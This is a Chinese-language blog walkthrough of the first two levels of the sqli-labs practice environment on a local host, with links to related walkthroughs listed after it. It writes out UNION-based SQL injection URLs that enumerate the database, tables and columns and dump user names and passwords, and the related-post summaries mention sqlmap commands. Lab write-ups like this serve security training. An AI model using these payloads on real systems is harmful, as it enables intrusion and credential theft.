SQL注入入门之sqli-labs-master练习

最新推荐文章于 2024-05-18 18:51:57 发布
最新推荐文章于 2024-05-18 18:51:57 发布
阅读量528 收藏 3
点赞数 1
分类专栏: 安全/web 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/buzhimingderen/article/details/105648920
版权

sql注入小白练习

主要是没事,简单的整理了一下,直接步入正题。

0x001

首先是最简单的get字符型sql注入
第一步进行判断:在这里插入图片描述

报错类型为字符,然后第二步就可以进行内联判断列了,这里我为了效率进行了一个省略,直接展示内联的回显结果:
在这里插入图片描述
可以看到我们在2,3位子是有回显的,这里我们就可以开始爆表名了:
http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ union select 1,database(),3 --+(这里我习惯了在url中使用–+,因为使用#号的话要进行一个统一资源定位符的转换),下面是查询结果
在这里插入图片描述
好,得到数据库名为:security;
第二步爆表名:http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 --+
在这里插入图片描述
得到了四个表名:emails,referers,uagents,users;这里我们根据常识知道用户数据肯定是在users表里,所以下一步爆列名:http://127.0.0.1/sqli-labs-master/Less-1/id= ’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3 --+
在这里插入图片描述
这里我们就得到了users表中的列名,根据列名,我们查询username,password就可以得到相关的数据了。
http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ union select 1,(select group_concat(username,0x23,password) from users),3 --+(这里值得注意的是,我在username和password中间加了一个0x23,作用是将返回的两个数值进行一个区分,回显后的结果就是这样的:
在这里插入图片描述
至此,我们第一个实验就算完成了。

0x002

第二关
通过简单的测试发现和上一个不太一样,这次我们注入单引号发现不行了。那么这里立马试一试:and 1=1;and 1=2。发现可以,是一个数字型的注入点:
在这里插入图片描述
在这里插入图片描述
那么我们就继续,先试试内联注入:
在这里插入图片描述
很好,发现在order by 4的时候报错了,那么我们就锁定了这是一个有3列的数据库表。继续常规操作爆库(这里我们实战的时候一般建议先查看一下版本号),这里正好它有两个回显位,我就一并查看了:http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,database(),version() --+
在这里插入图片描述
Ok,我们看到了这里数据库名是security;它的一个版本号是5.5.47(版本号有利于我们了解到它是否含有一些已知漏洞,在后续的其他渗透中我们可以进一步利用)。接下来就是和第一关一样的爆表,爆列,爆数据了,我直接上图吧。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这些在第一关都是操作过的,唯一的就是这里我把它多显示了一个id值。还是采用的0x23也就是#进行了一个分隔。总结一下来说第一、第二关主要是考察sql注入的两种触发报错类型:数字和其他(其他统一都是用单引号/双引号)。
**

0x003

**
后面的内容我如果哪天有时间了再列出来吧,因为晚上敲的,所以里面关于sql的查询语句没有进行详细的解释。我在后面一章的内容里会单独介绍的。

作者博客:由此去

在这里插入图片描述

zero_DAIDAI
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmapSQLi-LABS靶场 11-20
小明师傅博客
06-05 3646
11 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12 一模一样 第13 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14 一模一样 15 一模一样 16-20
渗透测试sqli-labs闯(11-17)
qq_43168364的博客
04-21 743
第十一:POST型的单引号报错注入点 方法:联合查询 输入用户名密码,打开bp进行抓包。 将抓到的包发送到repeater模块 首先判断闭合的方式是单引号,还是其他的。用单引号闭合时回显正常。 用双引号闭合时没用,回显,可知是用单引号闭合的。 判断列数 可知有两列,接下来我们就可用联合查询了。判断联合查询的回显是否正常。 接下来得到表名,语法:dumb' and 1=2 union......
Sqli-labs-master的环境搭建
m0_52505633的博客
04-10 2412
Sqli-libs是一位印度程序员写的,用来学习SQL注入的一个游戏教程。它是一个非常好的SQL注入学习实战平台,涵盖了报错注入、盲注、Update注入、Insert注入、Heather注入、二阶注入、绕过WAF,比较全面的一个注入平台。本次在phpstudy环境上部署sqli-labs 注入平台。 本次安装是在虚拟机windows10安装 ----注释---- phpstudy和sqli-labs等学习环境、靶场、工具尽量安装在虚拟机,以免某些设置、端口忘记闭,会存在安全隐患,包括一些软件本.
SQLi-labs-Master(1-22)新手通宝典
最新发布
Myosotis_LL的博客
05-18 2168
欢迎来到《SQLi-labs-Master新手通宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
渗透测试工具SQLmap
bangzhen5454的博客
02-25 150
一、简介 SQLmap 是一款用 Python 编写的开源渗透测试工具,用来自动检测和利用 SQL 注入漏洞。 二、Windows 下安装 2.1 安装 Python 环境   注:Python 3.0会出错 , Python>=2.6 且 <3.0   官网地址:https://www.python.org   按步骤下载安装完成后,在 PATH 环境...
sqli-labs-master 下载、搭建
m0_63521991的博客
01-28 980
sqli-labs-master 是一个帮助用户学习和测试 SQL 注入漏洞的开源项目。它提供了一系列的环境,用户可以在这些环境进行实验,学习如何检测、利用和防御 SQL 注入攻击。sqli-labs 下载地址: github.com/Audi-1/sqli-labs。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
在这个压缩包sqli-labs-php7可能包含一系列精心设计的练习,旨在帮助开发者理解和防御SQL注入攻击。通过这些练习,用户可以学习如何识别SQL注入的迹象,理解它们的工作原理,并掌握防御策略。在实践,这将提高...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程的漏洞,通过在应用程序的输入框插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master.zip
03-17
SQL-labs是一个专为初学者设计的SQL注入练习靶场,帮助用户深入理解SQL注入的原理、手法以及防御策略。在这个靶场,你可以通过实际操作,提升自己的Web安全技能和渗透测试能力。 SQL-labs靶场包含了丰富的练习...
sqli-labs-master less-1 详解
m0_63521991的博客
01-29 1313
这行代码将从URL参数获取的"id"值直接赋给变量$id,而没有对其进行任何过滤或转义。这导致了SQL注入漏洞的出现,可以通过在"id"参数插入恶意的SQL代码来执行任意的数据库操作。” 将$id变量插入到SQL查询,但没有对其进行任何过滤或转义,可以通过$id参数执行任意的数据库操作,而不受限于原始查询的意图。是 MySQL 数据库的一个元数据(metadata)数据库,它包含了于数据库、表、列、索引、权限等信息的元数据。联合查询 的前提是,两张表的列数相同,所以我们先表的判断列数。
Sqli-labs-master靶场1-23详细教程(基础篇)
一纸荒芜的博客
06-23 5219
Sqli-labs-master靶场1-23详细教程(基础篇)
Sqli-labs-master(1-65)
kfjrlgagkogkhpa的博客
08-11 527
sqli-lab(1-65)
Sqli-lab教程-史上最全详解(1-22通
qq_52364123的博客
04-10 9191
sql注入集合
sqli-labs-master靶场搭建流程(附下载链接)
qq_50744304的博客
08-03 1167
将其的dbuser改为数据库root账户名,dbpass改为数据库root账户密码,host可以改为127.0.0.1,也可以不改,别的不用动,改完后保存。注意:下载的最新版phpstudy自带的php版本为7.0以上,sqli靶场不支持,所以可以切换为低版本,我用的是5.3.29。不知道数据库名可以打开phpstudy,打开数据库就可以更改数据库root密码,默认密码为root。将sqli的压缩包移动到文件夹内并解压,解压后文件名可改为sqli,进入网站更便捷。后续会逐渐更新每一的流程哦,欢迎注!
sqli-labs-master之第三
weixin_66387649的博客
02-28 536
sqli-labs-master第三详解
sqli-labs-master Less-1
Risker
04-10 1078
提示提交id值,用单引号试一下,报错:猜测id值在查询语句被单引号包裹。接下来用order by测字段数 测出3个字段。然后看当前的数据库,构造payload:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  union select 1,1,database() %23给我返回了这个id=1的值:要执行union后的语句就要让union前的查询语...
sqli-labs-master手册
satasun的博客
04-19 2186
level1 输入:[http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1](http://127.0.0.1/New/sqli-labs-master/Less-1/?id=1) 后面加一个'并将后面注释掉试试效果: 构造?id=1' --+(这里#被注释了) 然后判断字段数 ?id=1' order by 3 --+ order by 3的时...
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值